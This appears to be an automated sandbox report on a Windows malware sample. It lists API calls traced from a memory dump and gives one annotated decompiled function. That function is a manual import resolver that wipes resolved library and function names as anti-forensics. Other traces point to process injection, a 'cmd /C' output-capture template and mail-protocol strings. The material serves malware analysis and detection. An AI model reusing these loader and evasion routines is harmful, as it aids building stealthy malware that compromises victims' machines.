  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				/* Manual import resolver for a mapped PE32 image: __edi = image base, _a4 = its IMAGE_NT_HEADERS32. */
				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000; /* return value, 0 on success */
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); /* NT headers + 0x80: DataDirectory[IMPORT].VirtualAddress */
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; /* first IMAGE_IMPORT_DESCRIPTOR */
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); /* descriptor.Name: RVA of the DLL name */
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); /* anti-forensics: zero the DLL name once the module is loaded */
					_t27 =  *_t34; /* descriptor.OriginalFirstThunk */
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); /* descriptor.FirstThunk: the IAT slots that receive the addresses */
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); /* Name field of the next descriptor (0x14 + 0xc) */
							_t34 = _t34 + 0x14; /* sizeof(IMAGE_IMPORT_DESCRIPTOR) */
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42; /* distance from the name thunk to its IAT slot */
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							/* bounds check against OptionalHeader.SizeOfImage (NT headers + 0x50) */
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2: skip IMAGE_IMPORT_BY_NAME.Hint to reach the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); /* zero the function name after it has been resolved */
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; /* write the resolved address into the IAT */
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; /* ERROR_PROC_NOT_FOUND */
						goto L19;
					}
					_t27 = _t35; /* no OriginalFirstThunk: walk FirstThunk instead */
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; /* ERROR_MOD_NOT_FOUND */
				goto L22;
			}
Per-statement address column for the listing above (shown beside the code in the report): 0x00401389 to 0x00401483.

APIs
